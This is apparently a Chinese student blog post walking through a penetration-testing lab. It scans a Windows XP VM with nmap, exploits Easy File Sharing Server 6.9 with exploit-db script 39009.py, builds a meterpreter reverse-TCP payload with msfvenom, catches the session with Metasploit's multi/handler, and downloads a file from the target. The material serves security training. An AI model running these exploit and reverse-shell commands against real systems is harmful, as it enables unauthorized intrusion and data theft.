复现任务A

一、 漏洞渗透测试

1、靶机安装easy file sharing server(efssetup_2018.zip)

在靶机winxp中利用命令ipconfig查看靶机IP地址

 

 

 

打开winxp,将easy file sharing server复制到c盘,双击运行,然后点try it,进入下图界面

 

 

 

2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100

然后在Kali虚拟机使用nmap  -sV IP地址扫描端口,可以看到80端口运行了easy file sharing server httpd 6.9

 

 


3、利用该漏洞,使得靶机运行计算器。P116-119

kali中输入searchsploit easy file sharing寻找可以利用的脚本。我们以倒数第六个的远程溢出漏洞渗透模块为例,对应所在的位置/usr/share/exploitdb/ platforms/windows/remote/39009.py。

 

 

 

打开该python文件,是一个计算器

 

 

 

利用python的一个代码脚本来写就是:python /usr/share/exploitdb/exploits/windows/remote/39009.py 

ip 80

 

 

 

发现错误,改用python2

 

 

 

done显示已经完成,返回winxp发现打开了一个计算器,并且发现刚才打开的easy file sharing server已经关闭

 

 

 

二、Metasploit应用

1、生成主控端、被控端。

Kali虚拟机上生成一个被控端。我们只是希望生成一个简单的被控端程序,那么只需要使用参数-p-f-o即可,分别指定要使用的被控端程序(通常可以使用Metasploit中内置的被控端程序)

kali中运用命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=ip lport=5000 -f exe -o /root/payload.exeipkali本机ip

 

 

 

kali中生成一个payload程序如下图

 

 

 

打开一个终端然后输入msfconsole启动Metasploit

 

 

 

将电脑主机当成靶机,执行以下命令

 

 

 

Metasploit中使用handler来作为主控端,这个handler位于exploit下的multi目录中,启动handler的命令如下:

Msf6> use exploit/multi/handler

然后设置payload(它其实就是前文的被控端程序)为windows/meterpreter/revese_tcp,设置lhost192.168.239.128192.168.239.128为我们之前所设置的lhost),lport5000,如图6-7所示,然后exploit等待对方上线

 

 

 

2、获得靶机(Windows)控制权。

将刚才在kali生成的payload程序拖到电脑桌面(关闭防火墙),双击运行

 

 

 

这时可以看到在session打开之后,下面出现了一个meterpreter,它其实就是一个被控端程序

 

 

 

3、下载靶机上任意一个文件。

使用pwd命令查看当前命令操作的目录

使用ls查看该主机系统包含哪些文件

 

 

 

xin.php文件为例,输入命令download xin.php

 

 

 

 

kali中发现该文件,证明下载成功

 

 

posted @ 2022-11-23 21:00  凉城的1号  阅读(55)  评论(0)    收藏  举报